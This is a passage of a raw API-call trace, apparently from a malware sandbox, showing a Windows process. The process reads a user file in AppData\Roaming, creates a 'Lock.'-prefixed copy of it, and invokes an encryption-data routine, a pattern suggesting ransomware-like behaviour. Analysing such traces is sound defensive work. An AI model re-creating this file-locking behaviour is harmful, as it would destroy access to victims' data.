lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0233.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0233.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0233.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0233.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0233.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0233.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0233.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0233.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0233.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0233.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0233.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0233.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0233.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0233.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0233.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0233.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0233.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0233.879] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0233.879] TranslateMessage (lpMsg=0x8cf708) returned 0 [0233.880] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0233.880] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0233.880] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0233.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0233.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0233.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0233.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0233.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0233.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0233.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0233.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0233.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0233.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0233.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0233.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0233.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0233.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0233.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0233.882] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/ljcsRI_.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ljcsri_.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0233.882] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.882] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0233.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0233.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0233.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0233.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0233.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0233.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0233.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0233.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0233.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0233.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0233.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0233.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0233.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0233.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0233.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0233.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0233.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0233.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0233.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0233.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0233.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0233.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0233.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0233.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0233.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0233.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0233.884] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0233.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0233.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0233.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0233.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0233.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0233.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0233.885] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.ljcsRI_.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.ljcsri_.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0233.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0233.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0233.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0233.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0233.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0233.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0233.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0233.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0233.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0233.887] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0233.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0233.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0233.887] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0233.887] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0233.887] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0233.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0233.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0233.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0233.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0233.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0233.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0233.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0233.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0233.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0233.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0233.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0233.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0233.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0233.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0233.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5b020 [0233.892] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0233.892] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0xb0ca, lpOverlapped=0x0) returned 1 [0233.896] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0233.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0233.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0233.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0233.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0233.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0ca) returned 0x2f14818 [0233.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5b020 | out: hHeap=0x970000) returned 1 [0233.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0233.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0233.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0233.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0233.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0233.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0233.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0233.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0233.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0ca) returned 0x2f1f8f0 [0233.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0233.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0233.903] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0233.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0233.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0233.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0233.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0233.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0ca) returned 0x2f14818 [0233.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0233.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0233.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0233.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0233.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0233.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0233.903] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0233.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0233.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0233.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0233.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0233.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0233.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0233.904] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0233.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0233.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0233.904] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0233.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0233.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0233.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0233.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0233.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0233.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0233.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0233.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0233.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0ca) returned 0x2f14818 [0233.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0233.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dc8 [0233.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0233.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0233.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0233.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550a8 [0233.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0233.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0233.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0233.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550c8 [0233.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0233.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0233.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0233.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0233.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0233.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0233.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0233.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0233.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0233.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0ca) returned 0x2f2a9c8 [0233.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0233.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0233.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0233.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0233.907] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0233.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0233.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0233.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0233.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0233.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0233.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) 